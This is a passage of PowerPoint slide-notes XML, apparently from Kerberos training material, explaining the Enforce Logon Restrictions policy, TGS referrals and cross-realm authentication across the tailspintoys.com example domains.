        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12524055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noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Enforce Logon Restrictions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Q: What does Enforce Logon Restrictions mean? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>A: There is a setting for the Kerberos policy called Enforce Logon Restrictions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>. With this setting enabled, every time a user uses a ticket-granting-ticket (TGT) to request a ticket, the account is checked to see if it is still valid. That would prevent a disabled account from obtaining new session tickets.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Additionally, for performance reasons, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>this policy is not checked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>This policy is only checked if it has not been checked recently :</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>If a TGT was granted in the last 20 minutes or if a restriction check was done in the last 20 minutes (too).  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(20 minutes ==  how long after a ticket is issued do we need to start checking restrictions again)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>If the client is from a different realm (domain).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Reference: 274064: Network Services Can Be Accessed After Account Is Disabled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://support.microsoft.com/default.aspx?scid=kb;EN-US;274064</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17484132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76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27386565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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30278635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78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23341162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900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The functions of the KDC are divided into two distinct services: an authentication service whose job is to issue TGTs, and a ticket-granting service whose job is to issue service tickets. This division of labor enables the Kerberos protocol to operate across domain boundaries. A client can get a TGT from the authentication service of one domain and use it to get service tickets from the ticket-granting service of another domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The Basic TGS Referral Process</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" b="1" i="1"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Clients typically need to request access to services outside of a single Kerberos realm. Whether in a pure Active Directory forest or in a mixed Kerberos environment, the referral process is the same. When a client requests a service ticket for a server in a remote Kerberos realm, the request is sent to the KDC in the client account's realm. The KDC determines that the server is in another realm, so it cannot issue a service ticket. This can only be done by a KDC in the target server's realm. So, instead of issuing the service ticket, the KDC in the client account's realm issues a TGS referral.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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TGS referral message is a normal KRB_TGS_REP message containing:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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A TGT for another trusted realm.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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Information indicating the KRB_TGS_REP is a referral to another </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TGS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:effectLst/>
              </a:rPr>
              <a:t>The client recognizes that the KRB_TGS_REP is a referral message and sends the TGT in a new KRB_TGS_REQ message to the remote realm to get the service ticket it needs.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Cross-Realm Authentication Between Two Realms</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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To understand how cross-realm authentication works, first consider the simplest case: a network with only two realms, East and West. If administrators for these realms are members of the same organization, or if for some other reason they are willing to treat the other realm's users as their own, they can enable authentication across realm boundaries simply by sharing an inter-realm key. (In Active Directory domains this happens automatically when two domains establish a trust relationship.) After the inter-realm key is shared, the ticket-granting service of each realm is registered as a security principal with the other realm's KDC. As a result, the ticket-granting service in each realm can treat the ticket-granting service in the other realm as just another service, something for which properly authenticated clients can request and receive service tickets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE"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When a user with an account in West wants access to a server with an account in East, the process is:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The Kerberos client on the user's workstation sends a request for a service ticket to the ticket-granting service in the user account's realm, West.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The ticket-granting service in West determines that the desired server is not a security principal in its realm, so it replies by sending the client a referral ticket—a TGT encrypted with the inter-realm key that the KDC in West</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>shares with the KDC in East.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The client uses the referral ticket to prepare a second request for a service ticket, and this time sends the request to the ticket-granting service in the server account's realm, East.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The ticket-granting service in East uses its copy of the inter-realm key to decrypt the referral ticket. If decryption is successful, it sends the client a service ticket to the desired server in its domain.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3001763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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30346065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effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The referral process is more complicated on networks with more than two realms. In theory, the KDC in each realm could establish a direct link to the KDC in every other realm on the network, in each case sharing a different inter-realm key. In practice, however, the number and complexity of these relationships could become unmanageable, especially on a large network. The Kerberos protocol solves the problem by making direct links unnecessary. A client in one realm can get a ticket to a server in another realm by traveling a referral path through one or more intermediate realms.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="333"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="de-DE"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For example, consider a network with three realms, east.tailspintoys.com, west.tailspintoys.com, and tailspintoys.com. The KDC in east.tailspintoys.com does not share an inter-realm key with the KDC in west.tailspintoys.com, but both KDCs do share inter-realm keys with tailspintoys.com. In this case, when a user with an account in west.tailspintoys.com wants access to a server with an account in east.tailspintoys.com, the referral path begins at the KDC for the user account's realm, west.tailspintoys.com, passes through an intermediate realm, tailspintoys.com, and ends at the KDC for the server account's realm, east.tailspintoys.com. The client must send its request for a service ticket three times, to three different KDCs. The three TGS exchanges are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The client requests the KDC for west.tailspintoys.com to give it a ticket to the server in east.tailspintoys.com. The KDC for west.tailspintoys.com replies by sending the client a referral ticket to the KDC for tailspintoys.com. This ticket is encrypted in the inter-realm key that west.tailspintoys.com shares with tailspintoys.com.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The client requests the KDC for tailspintoys.com to give it a ticket to the server in east.tailspintoys.com. The KDC for tailspintoys.com replies by sending the client a referral ticket to the KDC for east.tailspintoys.com. This ticket is encrypted in the inter-realm key that tailspintoys.com shares with east.tailspintoys.com.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The client requests the KDC for east.tailspintoys.com to give it a ticket to the server in east.tailspintoys.com. The KDC for east.tailspintoys.com can decrypt the TGT from tailspintoys.com. The TGT has the user's credentials and verifies that they have not been tampered with because they were encrypted with a key only the two KDC have. The KDC for east.tailspintoys.com sends back a ticket for the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>For a detailed look at the complete authentication process, see the next example, "Cross-Realm Authentication and Shortcut Trusts."</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="333"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe"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80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1216608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sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Suppose the user logs on at a workstation in west.tailspintoys.com. The user wants to connect to a shared file on a server in east.tailspintoys.com. Two steps occur before the cross-realm authentication steps:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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user uses Explorer to request a connection to \\server\shared folder.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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DNS resolves that the target server is located in east.tailspintoys.com.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="333"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>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sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Cross-Realm Authentication: Three Domains</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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To authenticate the user's identity to the server, the user needs a service ticket. Only the KDC in east.tailspintoys.com can issue this ticket. Although the user needs a TGT for that KDC, its initial ticket request needs to go to the local KDC for west.tailspintoys.com. The Kerberos SSP on the user's workstation must obtain a TGT for the server's domain and then use the TGT to get a ticket for the server.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="14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This involves a referral process that proceeds as follows:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1400" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The user's Kerberos client sends a KRB_TGS_REQ message to a local KDC in west.tailspintoys.com, specifying server@east.tailspintoys.com as the target. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The message includes:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
